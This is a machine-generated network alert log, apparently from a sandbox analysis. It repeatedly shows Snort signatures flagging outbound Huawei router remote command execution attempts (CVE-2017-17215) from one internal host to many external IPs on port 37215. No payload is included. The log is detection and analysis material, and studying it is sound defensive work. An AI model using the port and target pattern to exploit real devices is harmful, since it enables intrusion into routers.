                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:54396 -> 197.211.79.230:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:43774 -> 32.36.66.249:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:43774 -> 32.36.66.249:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:43756 -> 98.174.205.229:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:43756 -> 98.174.205.229:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:47718 -> 197.207.251.197:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:47718 -> 197.207.251.197:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:32850 -> 157.101.215.139:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:32850 -> 157.101.215.139:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:35830 -> 41.174.50.70:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:35830 -> 41.174.50.70:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:37516 -> 5.10.195.125:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:37516 -> 5.10.195.125:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:49444 -> 38.74.207.61:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:49444 -> 38.74.207.61:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:51422 -> 41.170.150.68:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:51422 -> 41.170.150.68:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:39398 -> 111.212.211.64:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:39398 -> 111.212.211.64:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:42396 -> 157.33.128.64:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:42396 -> 157.33.128.64:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:47892 -> 157.94.171.151:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:47892 -> 157.94.171.151:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:52122 -> 193.130.43.8:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:52122 -> 193.130.43.8:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:35980 -> 66.8.227.125:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:35980 -> 66.8.227.125:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:44190 -> 157.250.95.47:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:44190 -> 157.250.95.47:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:48892 -> 41.3.38.86:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:48892 -> 41.3.38.86:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:35010 -> 157.182.7.2:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:35010 -> 157.182.7.2:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:44270 -> 95.166.133.4:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:44270 -> 95.166.133.4:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:41482 -> 157.52.65.140:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:41482 -> 157.52.65.140:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:36592 -> 157.16.97.14:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:36592 -> 157.16.97.14:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:59720 -> 135.93.169.69:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:59720 -> 135.93.169.69:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:52898 -> 57.42.140.234:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:52898 -> 57.42.140.234:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:51050 -> 157.27.108.34:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:51050 -> 157.27.108.34:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:48166 -> 41.90.109.21:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:48166 -> 41.90.109.21:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:46280 -> 157.204.246.144:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:46280 -> 157.204.246.144:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:50460 -> 25.174.195.250:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:50460 -> 25.174.195.250:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:59100 -> 157.60.86.29:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:59100 -> 157.60.86.29:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:45118 -> 123.39.28.49:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:45118 -> 123.39.28.49:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:56742 -> 157.123.65.148:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:56742 -> 157.123.65.148:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:34402 -> 41.105.18.185:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:34402 -> 41.105.18.185:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:34354 -> 197.99.88.80:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:34354 -> 197.99.88.80:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:44774 -> 42.22.253.147:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:44774 -> 42.22.253.147:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:40130 -> 41.209.73.122:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:40130 -> 41.209.73.122:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:41948 -> 92.30.83.197:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:41948 -> 92.30.83.197:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:45414 -> 41.78.233.208:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:45414 -> 41.78.233.208:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:35718 -> 41.170.114.69:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:35718 -> 41.170.114.69:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:44572 -> 41.89.167.115:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:44572 -> 41.89.167.115:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:37926 -> 116.186.51.211:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:37926 -> 116.186.51.211:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:56626 -> 197.53.195.234:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:56626 -> 197.53.195.234:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:53066 -> 41.50.45.78:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:53066 -> 41.50.45.78:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:48692 -> 197.43.251.239:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:48692 -> 197.43.251.239:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:36690 -> 103.53.85.88:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:36690 -> 103.53.85.88:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:48152 -> 197.124.185.106:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:48152 -> 197.124.185.106:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:42858 -> 41.227.69.31:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:42858 -> 41.227.69.31:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:56904 -> 41.228.20.71:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:56904 -> 41.228.20.71:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:53912 -> 221.169.253.33:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:53912 -> 221.169.253.33:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:38292 -> 197.225.165.212:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:38292 -> 197.225.165.212:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:49830 -> 41.71.243.126:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:49830 -> 41.71.243.126:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:36964 -> 197.230.47.191:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:36964 -> 197.230.47.191:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:54420 -> 169.11.165.80:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:54420 -> 169.11.165.80:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:51028 -> 197.242.235.173:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:51028 -> 197.242.235.173:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:53044 -> 41.70.152.5:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:53044 -> 41.70.152.5:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:53968 -> 171.13.124.34:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:53968 -> 171.13.124.34:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:55646 -> 170.185.174.63:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:55646 -> 170.185.174.63:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:44380 -> 41.88.93.143:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:44380 -> 41.88.93.143:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:33932 -> 157.176.51.125:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:33932 -> 157.176.51.125:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:43706 -> 2.247.127.226:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:43706 -> 2.247.127.226:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:48954 -> 41.162.114.191:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:48954 -> 41.162.114.191:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:41520 -> 157.147.144.222:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:41520 -> 157.147.144.222:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:42312 -> 197.1.113.95:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:42312 -> 197.1.113.95:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:44188 -> 157.249.230.27:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:44188 -> 157.249.230.27:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:60348 -> 157.51.240.162:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:60348 -> 157.51.240.162:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:43278 -> 197.180.89.15:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:43278 -> 197.180.89.15:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:51536 -> 41.211.128.190:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:51536 -> 41.211.128.190:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:38372 -> 197.10.15.85:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:38372 -> 197.10.15.85:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:48260 -> 59.245.135.106:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:48260 -> 59.245.135.106:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:38216 -> 108.13.36.194:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:38216 -> 108.13.36.194:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:52398 -> 41.32.89.88:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:52398 -> 41.32.89.88:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:44220 -> 41.235.170.24:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:44220 -> 41.235.170.24:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:43852 -> 130.62.248.59:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:43852 -> 130.62.248.59:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:47518 -> 177.47.141.82:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:47518 -> 177.47.141.82:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:44698 -> 157.171.1.11:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:44698 -> 157.171.1.11:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:50650 -> 157.154.166.148:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:50650 -> 157.154.166.148:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:59908 -> 157.166.157.182:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:59908 -> 157.166.157.182:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:59238 -> 81.152.255.200:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:59238 -> 81.152.255.200:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:36448 -> 4.157.212.68:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:36448 -> 4.157.212.68:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:41356 -> 41.35.122.61:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:41356 -> 41.35.122.61:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:33968 -> 41.29.129.224:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:33968 -> 41.29.129.224:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:42990 -> 157.113.242.221:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:42990 -> 157.113.242.221:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:38014 -> 157.133.236.121:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:38014 -> 157.133.236.121:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:46742 -> 112.105.52.174:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:46742 -> 112.105.52.174:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:37214 -> 98.112.11.193:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:37214 -> 98.112.11.193:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:58570 -> 41.128.34.69:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:58570 -> 41.128.34.69:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:34648 -> 157.198.75.20:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:34648 -> 157.198.75.20:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:39522 -> 157.45.111.206:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:39522 -> 157.45.111.206:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:58772 -> 157.151.135.126:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:58772 -> 157.151.135.126:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:52570 -> 41.159.106.191:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:52570 -> 41.159.106.191:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:37678 -> 197.159.115.4:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:37678 -> 197.159.115.4:37215
                  Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:44106 -> 146.131.158.186:37215
                  Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:44106 -> 146.131.158.186:37215
